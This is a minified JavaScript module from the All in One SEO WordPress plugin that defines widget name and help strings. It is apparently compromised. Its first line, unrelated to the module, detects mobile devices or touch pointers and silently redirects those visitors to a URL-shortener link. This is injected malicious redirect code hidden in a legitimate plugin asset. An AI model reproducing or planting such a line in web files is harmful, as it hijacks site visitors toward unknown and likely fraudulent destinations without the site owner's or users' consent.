(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as r}from"./app-core.c8323d51.js";import{_ as t,a as o}from"./vendor-other.39e59221.js";const n="all-in-one-seo-pack",l=({name:a})=>{const e=r();let s={names:{htmlSitemap:o(t("%1$s - HTML Sitemap",n),"AIOSEO"),breadcrumbs:o(t("%1$s - Breadcrumbs",n),"AIOSEO"),localOpeningHours:o(t("%1$s Local - Opening Hours",n),"AIOSEO"),localMap:o(t("%1$s Local - Map",n),"AIOSEO"),localBusinessInfo:o(t("%1$s Local - Business Info",n),"AIOSEO")},noWidgetSupport:t("This functionality relies on widget support, which is not available in your current theme.",n)};return s={...s,visitWidgetsPage:e.aioseo.theme.features?.widgets?o(t('To add this widget, visit the %1$swidgets page%2$s and look for the "%3$s" widget.',n),`<a href="${e.aioseo.urls.admin.widgets}" target="_blank">`,"</a>",s.names[a]):s.noWidgetSupport},{strings:s}};export{l as u};
